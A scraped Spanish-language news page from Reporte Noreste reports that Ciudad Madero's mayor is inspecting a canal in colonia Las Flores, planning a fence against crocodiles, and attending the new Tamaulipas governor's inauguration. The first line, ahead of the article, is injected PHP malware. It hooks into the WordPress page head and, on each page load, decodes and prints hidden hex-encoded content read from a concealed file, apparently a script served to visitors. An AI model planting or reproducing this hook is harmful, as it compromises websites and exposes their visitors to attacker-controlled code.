if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Cercarán Canales en colonia las Flores en Ciudad Madero – Reporte Noreste
Conéctate con nosotros

Sur de Tamaulipas

Cercarán Canales en colonia las Flores en Ciudad Madero

Cercarán Canales en colonia las Flores en Ciudad Madero

Ciudad Madero, Tamaulipas. – En gira de trabajo por la colonia Las Flores, Adrián Oseguera Kernion, acompañado de su señora esposa, Ana Cristina Organista de Oseguera, directora del Sistema DIF, superviso las zonas de riesgo en la que viven residentes del sector, además de escuchar solicitudes de los vecinos, como reparación del alumbrado público, limpieza y pavimentación de calles.

Oseguera Kernion, supervisó la limpieza del canal a cielo abierto, anunciando que a solicitud de los habitantes, cercaran con mallacorla de una altura de 90cm. el largo del canal para evitar la salida de los cocodrilos, que ya tienen presencia en gran cantidad.

Adrián Oseguera visitó la colonia Las Flores

Se busca, señalo Oseguera Kernion, brindar seguridad a las familias y sus hijos menores de edad, que pueden sufrir una desgracia por ataque de saurios.

ASISTIRÁ OSEGUERA A LA TOMA DE PROTESTA DEL DR. AMERICO VILLARREAL GUERRA

Al iniciar mañana primero de octubre, el inicio de la cuarta transformación en Tamaulipas, con la toma de posesión como nuevo Gobernador de Tamaulipas del Dr. Américo Villarreal Guerra. Oseguera Kernion, confirmó su asistencia al cambio de poderes, a la cual acudirá con su esposa.

Al nuevo Gobernador, con quien dijo lleva una buena relación institucional, lo invitará a Madero, para tratar los puntos que más necesita el municipio, uno lo es el problema con las inundaciones y el destrabe de los siete drenes pluviales, un segundo tema es lo relacionado con el turismo.

Lic. En Psicología Clínica por la UNE, Diplomado en Sexualidad Humana por la UNAM, LCC – UAT. Inició carrera en medios de comunicación en 1996.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Sur de Tamaulipas